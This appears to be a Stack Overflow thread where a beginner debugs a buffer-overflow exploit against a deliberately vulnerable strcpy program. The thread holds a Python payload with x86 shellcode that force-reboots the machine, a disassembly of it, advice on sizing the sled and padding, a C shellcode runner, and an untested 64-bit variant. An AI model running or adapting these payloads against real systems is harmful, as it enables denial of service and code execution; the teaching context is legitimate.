# Segmentation Fault shell code testing kali 2018

Tags: python, c, shell, reverse-engineering, payload

I've read many articles and examples but I have no idea what I can do now. So, I want to test a shellcode for this vulnerable program:

```
#include <string.h>
#include <stdio.h>
void main(int argc, char *argv[]) {
    copier(argv[1]);
    printf("Done!\n");
}
int copier(char *str) {
    char buffer[100];
    strcpy(buffer, str);
}
```

Script to run my shellcode (force restart):

```
#!/usr/bin/python

nopsled = '\x90' * 64
shellcode = (
'\x31\xc0\x50\x68\x62\x6f\x6f\x74\x68\x6e' +
'\x2f\x72\x65\x68\x2f\x73\x62\x69\x89\xe3' +
'\x50\x66\x68\x2d\x66\x89\xe6\x50\x56\x53' +
'\x89\xe1\xb0\x0b\xcd\x80'
)
padding = 'A' * (112 - 64 - 36)
eip = '\x70\xf1\xff\xbf'
print nopsled + shellcode + padding + eip
```

Here you can see that my shellcode is loaded properly:

The registers from esp

[image: registers from esp]

And that my return address is: 0xbffff170. So why is my program not working? Please, help me

Comment: how do the python and C scripts pass values?

Comment: How did you compile the C code? You might want to try disassembling the executable to ensure that it actually is vulnerable.

Comment: @Shlomi Agiv I don't know, I was just following the tutorial

Comment: @Daniel Pryden I compiled it with -g -z execstack -no-pie flags

Answer (score 2, accepted):

So by my calculations this is what your shellcode is doing (here in Intel Assembly syntax):

```
0xbffff19c:  31 c0                  xor    eax,eax
0xbffff19e:  50                     push   eax
0xbffff19f:  68 62 6f 6f 74         push   0x746f6f62
0xbffff1a3:  68 6e 2f 72 65         push   0x65722f6e
0xbffff1a9:  68 2f 73 62 69         push   0x6962732f
0xbffff1ae:  89 e3                  mov    ebx,esp
0xbffff1b0:  50                     push   eax
0xbffff1b1:  66 68 2d 66            pushw  0x662d
0xbffff1b5:  89 e6                  mov    esi,esp
0xbffff1b7:  50                     push   eax
0xbffff1b8:  56                     push   esi
0xbffff1b9:  53                     push   ebx
0xbffff1ba:  89 e1                  mov    ecx,esp ; ecx = (char**) {"/sbin/reboot", "-f"}
0xbffff1bc:  b0 0b                  mov    al,0xb
0xbffff1be:  cd 80                  int    0x80    ; syscall sys_execve()
```

The segmentation fault is happening at `0xbffff1b8`, even though as you can see the opcode there is perfectly valid. So what could have happened? Lets see...

You might notice that there is quite a bit of `push`ing going on. All those `push`es overwrite data in the call stack. 34 bytes of it in total, to be precise.

Yes, the same call stack where the shellcode itself is stored... are you connecting the dots? The shellcode is overwriting itself and destroying it's own code. It started fine but by the time it reached `0xbffff1b8`, the valid code was no longer there as it got overwritten by something else entirely.

You need to make sure the length of `padding` and `eip` combined is 34 or more, so that the shellcode has enough stack space to work before it starts overwriting it's own code.

That said, `padding` has to be at least 18 bytes longer.

Cut `nopsled` length by 32 bytes, just to make it roomy, and transfer those bytes to `padding`. This should reserve enough stack space for the shellcode to do it's thing without breaking itself.

And since the `eip` address is currently 44 bytes before the shellcode starts, there is no need to adjust it.

There are other things that need to be observed as well, first, once the shellcode is done running, it no longer cares what happens next. That means even while working as intended, this program will crash, just after it's done calling the reboot.

Also, `/sbin/reboot` may require root access to work. If this process is not running as root, it won't reboot (it will just crash).

Comment: Sorry but I'm just the beginner and I'm not sure if I understood you correctly. My shellcode is 36 bytes long. I created 64 bytes of nopsled before shellcode, 16 bytes of padding after shellcode (116-64-36) and added return address at the end of it all. So what you say is to create 32 bytes of nopsled + 36 bytes of shellcode + 32 bytes of padding and then return address? When I do so, my program works without segmentation fault but the shellcode is not executing

Comment: @Shirakumo I reformulated my answer, I hope it's more clear now.

Comment: I  took new screenshot of my modified program, please take a look on my answer below. I have no idea why it's not working.

Answer (score 0):

@Havenard I don't know what am I doing wrong. I've modified my code so now there are 24bytes of nopsled, 36 bytes of shellcode, 44 bytes of padding and then return address. As you can see below:

[image]

I am on the root account so it should work. When I use the code from shell-strom it restarts my computer normally. I mean when I compile and run the code below as normal program:

```
#include <stdio.h>
#include <string.h>

char *shellcode = "\x31\xc0\x50\x68\x62\x6f\x6f\x74\x68\x6e"
                  "\x2f\x72\x65\x68\x2f\x73\x62\x69\x89\xe3"
                  "\x50\x66\x68\x2d\x66\x89\xe6\x50\x56\x53"
                  "\x89\xe1\xb0\x0b\xcd\x80";

int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}
```

Comment: Well, on your original screenshot, I can tell you wrote 116 bytes to the buffer, just by looking at what's in the stack (counting bytes from `0x90909090` to `0xbffff170`), in this one I'm looking at 104. Clearly something is wrong with your payload. Also the address of `buffer` changed which is weird, but it should still work. Shouldn't `nopsled` have 32 bytes? It seems to have only 20.

Comment: @Havenard I am so confused now. I also discovered that there is a difference when I'm working on 32bit or 64bit virtual machine. When I follow the tutorial on YT and disassemble function main on 32bit system, mine result is different than from the tutorial. When I use 64bit system it looks the same but esp is changed for rsp, so my return address is 6bytes, so how can I put it to my code then? I found only 1 tutorial which worked for me so far, but when I tried to edit it... it doesn't work

Comment: In 64-bit architecture, memory addresses are 64-bits (8 bytes). This entire shellcode would have to change. It is only compatible with 32-bit systems.

Comment: So if my main computer is 64bit should I focus on working with 64bit machines? As I told you, when I disassemble program on my 32bit virtual machine it looks different than from tutorials, and I don't know why exactly, I don't think they use 32bit systems normally

Comment: Well, 32-bit is a dying platform, nowadays almost everything uses 64-bits even when it doesn't have more than 4GB of memory to address, but you might have a hard time finding learning material for this kind of hack for 64-bit. 32-bit was around for a very long time and particularly during the period when hacking was a hot topic, almost every literature out there refers to 32-bit systems.

Comment: Anyway, if you want to try it in 64-bit, I believe this version of the shellcode should work: `"\x48\x31\xC0\x50\x68\x62\x6F\x6F\x74\x68\x6E\x2F\x72\x65\x68\x2F\x73\x62\x69\x48\x89\xE3\x50\x66\x68\x2D\x66\x48\x89\xE6\x50\x56\x53\x48\x89\xE1\xB0\x0B\x0F\x05"`, I haven't tested it but it's now compatible with 64-bits. This shellcode now is 40 bytes and needs 54 bytes of free stack space to work.

Comment: Thank you so much. Is there any way I can contact you? I want to ask something with picture and I don't know I can continue asking questions here or it'll be better to ask you somewhere else.

Comment: Just make a new question on SO.

Comment: @Havenard I asked new question, I would be really grateful if you can have a look